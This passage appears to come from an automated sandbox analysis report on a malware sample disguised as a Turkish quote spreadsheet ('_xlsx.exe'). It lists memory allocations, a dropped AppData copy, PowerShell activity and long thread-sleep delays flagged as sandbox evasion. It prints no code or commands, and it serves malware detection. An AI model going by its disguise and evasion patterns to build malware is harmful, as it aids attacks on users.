                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory allocated: 31D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory allocated: 3340000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory allocated: 5340000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory allocated: 8030000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory allocated: 9030000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory allocated: 91E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory allocated: A1E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory allocated: 1030000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory allocated: 1290000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeMemory allocated: 1020000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeMemory allocated: 4B60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeMemory allocated: 7300000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeMemory allocated: 8300000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeMemory allocated: 8490000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeMemory allocated: 9490000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeMemory allocated: 12B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeMemory allocated: 3000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeMemory allocated: 2E40000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599874Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599764Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599654Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598999Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598341Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598233Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598124Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597577Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597248Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597030Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596921Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596374Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596046Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595937Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595499Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595280Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595171Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 594624Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599765
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599547
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599219
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599094
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598984
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598875
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598765
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598656
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598547
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598438
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598313
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598188
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598078
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597969
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597844
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597734
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597625
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597516
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597406
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597294
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597185
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597074
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 596967
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 596827
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 596650
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 596345
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 596219
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 596109
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 596000
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595891
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595781
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595662
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595547
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595437
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595328
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595216
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595109
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594997
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594890
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594781
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594671
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594562
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594452
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594344
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594234
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6211Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7735Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeWindow / User API: threadDelayed 3461Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeWindow / User API: threadDelayed 6395Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeWindow / User API: threadDelayed 3586
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeWindow / User API: threadDelayed 6252
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7484Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep count: 6211 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep count: 92 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep count: 31 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8136Thread sleep count: 3461 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -599874s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8136Thread sleep count: 6395 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -599764s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -599654s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -599218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -598999s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -598890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -598671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -598562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -598341s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -598233s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -598124s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -598015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -597906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -597796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -597687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -597577s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -597468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -597359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -597248s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -597140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -597030s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -596921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -596812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -596593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -596484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -596374s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -596265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -596156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -596046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -595937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -595828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -595718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -595609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -595499s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -595390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -595280s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -595171s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -595062s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -594953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -594843s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -594734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132Thread sleep time: -594624s >= -30000sJump to behavior
